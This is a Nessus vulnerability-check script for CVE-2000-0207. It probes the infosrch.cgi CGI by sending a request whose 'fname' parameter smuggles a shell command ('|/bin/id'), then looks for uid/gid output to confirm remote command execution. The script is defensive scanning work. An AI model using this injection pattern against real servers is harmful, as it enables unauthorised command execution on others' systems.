#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10128);
 script_version ("$Revision: 1.15.2.1 $");
 script_bugtraq_id(1031);
 script_cve_id("CVE-2000-0207");
 name["english"] = "infosrch.cgi";
 name["francais"] = "infosrch.cgi";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "The 'infosrch.cgi' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).

Solution : Remove it from /cgi-bin.

Risk factor : Serious";


 desc["francais"] = "Le cgi 'infosrch.cgi' est install. Celui-ci possde
un problme de scurit bien connu qui permet  n'importe qui de faire
executer des commandes arbitraires au daemon http, avec les privilges
de celui-ci (root ou nobody). 

Solution : retirez-le de /cgi-bin.

Facteur de risque : Srieux";


 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Checks for the presence of /cgi-bin/infosrch.cgi";
 summary["francais"] = "Vrifie la prsence de /cgi-bin/infosrch.cgi";
 
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_GATHER_INFO);
 
 
 script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
		francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes", "no404.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");
port = get_kb_item("Services/www");
if(!port) port = 80;
if(!get_port_state(port))exit(0);


cgibin = cgibin();
soc = http_open_socket(port);
if(soc)
{
 req = http_get(item:"/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id",port:port);
 send(socket:soc, data:req);
 rep = http_recv(socket:soc);
 http_close_socket(soc);
 if(("uid=" >< rep) && ("gid=" >< rep)){
      security_hole(port);
      exit(0);
      }

 req2 = http_get(item:string(cgibin,"/infosrch.cgi?cmd=getdoc&db=man&fname=|/usr/bin/id"), port:port);
 soc2 = http_open_socket(port);
 send(socket:soc2, data:req2);
 r2 = http_recv(socket:soc2);
 http_close_socket(soc2);
 if(("uid=" >< r2) && ("gid=" >< r2)){
      security_hole(port);
      exit(0);
      }
}

